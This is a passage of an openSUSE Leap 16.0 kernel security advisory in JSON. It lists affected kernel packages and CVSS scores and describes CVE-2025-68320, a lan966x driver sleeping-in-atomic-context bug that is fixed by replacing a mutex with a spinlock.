"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68297"
},
{
"cve": "CVE-2025-68320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlan966x: Fix sleeping in atomic context\n\nThe following warning was seen when we try to connect using ssh to the device.\n\nBUG: sleeping function called from invalid context at kernel/locking/mutex.c:575\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear\npreempt_count: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE\nTainted: [W]=WARN\nHardware name: Generic DT based system\nCall trace:\n unwind_backtrace from show_stack+0x10/0x14\n show_stack from dump_stack_lvl+0x7c/0xac\n dump_stack_lvl from __might_resched+0x16c/0x2b0\n __might_resched from __mutex_lock+0x64/0xd34\n __mutex_lock from mutex_lock_nested+0x1c/0x24\n mutex_lock_nested from lan966x_stats_get+0x5c/0x558\n lan966x_stats_get from dev_get_stats+0x40/0x43c\n dev_get_stats from dev_seq_printf_stats+0x3c/0x184\n dev_seq_printf_stats from dev_seq_show+0x10/0x30\n dev_seq_show from seq_read_iter+0x350/0x4ec\n seq_read_iter from seq_read+0xfc/0x194\n seq_read from proc_reg_read+0xac/0x100\n proc_reg_read from vfs_read+0xb0/0x2b0\n vfs_read from ksys_read+0x6c/0xec\n ksys_read from ret_fast_syscall+0x0/0x1c\nException stack(0xf0b11fa8 to 0xf0b11ff0)\n1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001\n1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001\n1fe0: 0005404c be9048c0 00018684 b6ec2cd8\n\nIt seems that we are using a mutex in a atomic context which is wrong.\nChange the mutex with a spinlock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
